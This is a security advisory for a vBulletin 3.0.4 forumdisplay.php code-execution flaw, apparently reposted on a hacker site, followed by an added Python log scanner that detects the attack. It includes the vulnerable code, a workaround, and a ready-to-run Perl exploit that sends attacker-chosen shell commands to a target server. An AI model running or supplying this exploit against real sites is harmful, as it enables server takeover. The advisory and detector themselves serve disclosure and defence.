vBulletin forum forumdisplay.php arbitrary code execution vulnerability
Author: unknown    Source: CnXHacker.Net    Updated: 2005-2-21
vBulletin forumdisplay.php Command Execution Vulnerability

vBulletin is "a powerful and widely used bulletin board system, based on PHP language and MySQL database". A vulnerability in vBulletin's forumdisplay.php allows a remote attacker to cause the PHP script to execute arbitrary code via the 'comma' variable.

Credit: The information has been provided by al3ndaleeb.

Details

Vulnerable Systems:
 * vBulletin version 3.0.4 and prior

Immune Systems:
 * vBulletin version 3.0.5 or newer

Vulnerable code in forumdisplay.php:

    if ($vboptions['showforumusers'])
    {
        . . . .
        if ($bbuserinfo['userid'])
        {
            ...
            $comma = ', ';
        }
        ...
        while ($loggedin = $DB_site->fetch_array($forumusers))
        {
            ...
            eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser') . '";');   <<==== (Vuln)
            $comma = ', ';
            ...
        }
        ...
    }

Prerequisites:
 * $vboptions['showforumusers'] == True: the admin must have set showforumusers ON in vBulletin options
 * $bbuserinfo['userid'] == 0: you must be a visitor/guest, so that $comma is not initialised before the loop
 * $DB_site->fetch_array($forumusers) == True: when you visit the forum, at least one user must be shown as viewing it
 * magic_quotes_gpc must be OFF
 * You must bypass the unset($GLOBALS["$_arrykey"]) code in init.php by using: GLOBALS[]=1

Workaround:
 * Disable showforumusers in vBulletin options.
 * Add the following line before if ($vboptions['showforumusers']):

    $comma = '';

Exploit:

    #!/usr/bin/perl
    # vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net>
    #
    # Requirement:
    #   showforumusers ON
    #
    #
    # bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net>
    #
    # usage :
    #   vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command>
    #
    # example :
    #   vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la"
    #
    # !! Happy Chinese new Year !!

    use IO::Socket;

    sub parse_url {
        local($url) = @_;
        if ($url =~ m#^(\w+):#) {
            $protocol = $1;
            $protocol =~ tr/A-Z/a-z/;
        } else {
            return undef;
        }
        if ($protocol eq "http") {
            if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) {
                $server = $1;
                $server =~ tr/A-Z/a-z/;
                $port = ($2 ne "" ? $2 : $http_port);
                $path = ( $3 ? $3 : '/');
                return ($protocol, $server, $port, $path);
            }
            return undef;
        }
    }

    sub urlencode{
        my($esc) = @_;
        $esc =~ s/^\s+|\s+$//gs;
        $esc =~ s/([^a-zA-Z0-9_\-.])/uc sprintf("%%%02x",ord($1))/eg;
        $esc =~ s/ /\+/g;
        $esc =~ s/%20/\+/g;
        return $esc;
    }

    $url = $ARGV[0];
    $fid = $ARGV[1];
    $cmd = urlencode($ARGV[2]);
    $http_port = 80;
    $shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma={\${system(\$cmd)}}{\${exit()}}";
    @target = parse_url($url);
    $conn = IO::Socket::INET->new (
        Proto => "tcp",
        PeerAddr => $target[1],
        PeerPort => $target[2],
    ) or die "\nUnable to connect\n";
    $conn -> autoflush(1);
    print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n";
    while (<$conn>){
        print $_;
    }
    close $conn;
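As an added defender-side example (not part of the advisory and not vBulletin code), the following Python scans web server access logs for requests shaped like the one above: a GLOBALS[] query key, which is the init.php unset() bypass listed in the prerequisites, and a comma parameter that carries PHP string interpolation, which is what reaches the eval(). The Apache combined-log lines are constructed for the example, and the function and variable names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines (not taken from the page): a plain
# forum view, a harmless request that happens to carry a "comma" parameter,
# and a request shaped like the advisory's payload.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Feb/2005:10:01:02 +0000] "GET /forumdisplay.php?f=1 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.6 - - [21/Feb/2005:10:02:15 +0000] "GET /forumdisplay.php?f=2&comma=%2C HTTP/1.1" 200 4980 "-" "Mozilla/4.0"
10.0.0.7 - - [21/Feb/2005:10:03:44 +0000] "GET /forumdisplay.php?GLOBALS[]=1&f=1&cmd=ls+-la&comma=%7B%24%7Bsystem%28%24cmd%29%7D%7D%7B%24%7Bexit%28%29%7D%7D HTTP/1.1" 200 311 "-" "Mozilla/4.0"
"""

# Client address, timestamp and request target from a combined-log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# PHP interpolation markers inside a double-quoted string: ${...} or {$...}.
PHP_INTERP_RE = re.compile(r'\$\{|\{\$')


def analyse_request(target):
    """Return the reasons a request target matches the forumdisplay.php attack shape.

    An empty list means the request looks benign for this check.
    """
    parts = urlsplit(target)
    # The vulnerable eval() lives in forumdisplay.php, so scope the check to it.
    if not parts.path.endswith('forumdisplay.php'):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes values
    reasons = []
    # Any GLOBALS or GLOBALS[...] key is the register_globals bypass from init.php.
    if any(key == 'GLOBALS' or key.startswith('GLOBALS[') for key in params):
        reasons.append('GLOBALS[] register_globals bypass')
    # A "comma" value only reaches the eval() with PHP interpolation inside it.
    if any(PHP_INTERP_RE.search(value) for value in params.get('comma', [])):
        reasons.append('PHP interpolation in comma parameter')
    return reasons


def scan_log(text):
    """Parse each log line and return a finding dict for every suspicious request."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # malformed line; skip rather than guess
        reasons = analyse_request(match.group('target'))
        if reasons:
            findings.append({
                'ip': match.group('ip'),
                'timestamp': match.group('ts'),
                'target': match.group('target'),
                'reasons': reasons,
            })
    return findings


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ip']} {finding['timestamp']} -> {', '.join(finding['reasons'])}")
```

The two signals are checked independently on purpose: a GLOBALS[] key on its own is worth a look on any PHP application of that era, and the path check in analyse_request can be widened if you want to see it across every script rather than only forumdisplay.php.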
Entered by: IceRiver    Editor: IceRiver
CnXHacker.CoM © Copyright 2002-2006, CnXHacker.CoM, Inc. All Rights Reserved.